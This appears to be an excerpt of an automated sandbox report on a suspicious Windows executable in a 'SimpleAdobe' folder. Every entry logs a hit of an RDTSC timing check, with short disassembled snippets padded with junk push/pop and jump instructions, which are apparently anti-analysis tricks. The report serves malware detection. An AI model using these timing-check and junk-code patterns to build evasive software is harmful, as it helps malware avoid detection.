Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C7B333 second address: C7B340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7F0D2259B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C7B340 second address: C7B34D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F7F0D21AE06h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C7E029 second address: C7E02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C7E02F second address: C7E044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F7F0D21AE0Ah 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C7E044 second address: C7E05A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7F0D2259B6h 0x00000010 jl 00007F7F0D2259B6h 0x00000016 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C83E5F second address: C83E6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: B9A4A0 second address: B9A4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C90C82 second address: C90C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C90AD4 second address: C90AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F7F0D2259C4h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jne 00007F7F0D2259B6h 0x0000001b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C90AFE second address: C90B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C97B78 second address: C97B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C97B7C second address: C97B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F0D21AE0Eh 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C97D58 second address: C97D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jns 00007F7F0D2259BAh 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C97EB9 second address: C97EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98024 second address: C9802F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F7F0D2259B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C9819F second address: C981CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F7F0D21AE0Bh 0x0000000b jmp 00007F7F0D21AE0Eh 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F7F0D21AE12h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C981CA second address: C981DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7F0D2259B6h 0x0000000a push edi 0x0000000b jne 00007F7F0D2259B6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C981DC second address: C981EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F0D21AE0Eh 0x00000008 je 00007F7F0D21AE06h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C981EF second address: C981FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F0D2259B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98393 second address: C98397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C984E7 second address: C984F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7F0D2259B8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C984F7 second address: C984FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C984FB second address: C98501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98F77 second address: C98F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98F7B second address: C98F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98F86 second address: C98F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F0D21AE06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98F95 second address: C98FA7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F0D2259B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F7F0D2259C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C98FA7 second address: C98FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C9B76D second address: C9B771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C9B771 second address: C9B77F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7F0D21AE08h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C9E47B second address: C9E482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CAA086 second address: CAA08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CAA08C second address: CAA09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7F0D2259B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CACB57 second address: CACB5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CB2D8A second address: CB2D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CB2D90 second address: CB2D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CB2C4E second address: CB2C58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CB2C58 second address: CB2C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CB2C5C second address: CB2C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CD9A74 second address: CD9A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F7F0D21AE06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F7F0D21AE0Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CD9BB4 second address: CD9BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CD9BB8 second address: CD9BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F7F0D21AE22h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CD9BE4 second address: CD9BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDA1CB second address: CDA1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDA339 second address: CDA356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F0D2259C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDA4AB second address: CDA4E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F0D21AE17h 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e jne 00007F7F0D21AE06h 0x00000014 jc 00007F7F0D21AE06h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F0D21AE0Ch 0x00000022 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDA661 second address: CDA678 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7F0D2259C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDC124 second address: CDC130 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F0D21AE0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDEAEA second address: CDEAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDEAEF second address: CDEAF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CDEAF4 second address: CDEAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: CE1D1B second address: CE1D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51601B8 second address: 51601BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51601BC second address: 51601C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51601C0 second address: 51601C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51601C6 second address: 51601CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51601CC second address: 51601DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51601DB second address: 51601EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 515003C second address: 515006E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7F0D2259C4h 0x0000000c xor cl, 00000018h 0x0000000f jmp 00007F7F0D2259BBh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 515006E second address: 5150072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5150072 second address: 5150076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5150076 second address: 515007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 515007C second address: 51500B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7F0D2259C0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7F0D2259C7h 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51500B6 second address: 51500BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51500BC second address: 51500C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51200BB second address: 51200D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 mov dh, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 mov edx, 62A7668Ch 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51200D4 second address: 5120126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C7B7h 0x00000007 movzx esi, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F7F0D2259BFh 0x00000014 push dword ptr [ebp+04h] 0x00000017 jmp 00007F7F0D2259C6h 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f jmp 00007F7F0D2259C0h 0x00000024 push dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120126 second address: 512012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, dl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5140CB9 second address: 5140CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5140CBF second address: 5140CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5140CC3 second address: 5140CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, 38771FD2h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov bl, 9Ah 0x00000016 call 00007F7F0D2259BEh 0x0000001b pop esi 0x0000001c popad 0x0000001d movsx edi, si 0x00000020 popad 0x00000021 pop ebp 0x00000022 pushad 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 514094F second address: 5140953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5140953 second address: 5140959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5140959 second address: 514095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 514086E second address: 51408BA instructions: 0x00000000 rdtsc 0x00000002 call 00007F7F0D2259C5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebp 0x0000000c jmp 00007F7F0D2259BCh 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov cx, di 0x0000001a call 00007F7F0D2259C9h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51408BA second address: 51408C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51408C0 second address: 51408C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51405D2 second address: 514063A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7F0D21AE0Ah 0x00000013 add cx, E7D8h 0x00000018 jmp 00007F7F0D21AE0Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7F0D21AE18h 0x00000024 add si, 3238h 0x00000029 jmp 00007F7F0D21AE0Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 514063A second address: 5140640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5150445 second address: 5150449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5150449 second address: 515044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 515044D second address: 5150453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5150453 second address: 515046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D2259C3h 0x00000009 rdtsc
